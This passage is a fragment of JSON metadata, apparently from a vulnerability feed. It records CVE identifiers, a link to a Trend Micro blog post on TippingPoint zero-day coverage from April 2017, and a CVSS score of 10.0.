"CVE-2017-0714", "CVE-2017-3018", "CVE-2001-0236"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2017-04-21T18:23:45", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-april-17-2017/", "id": "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}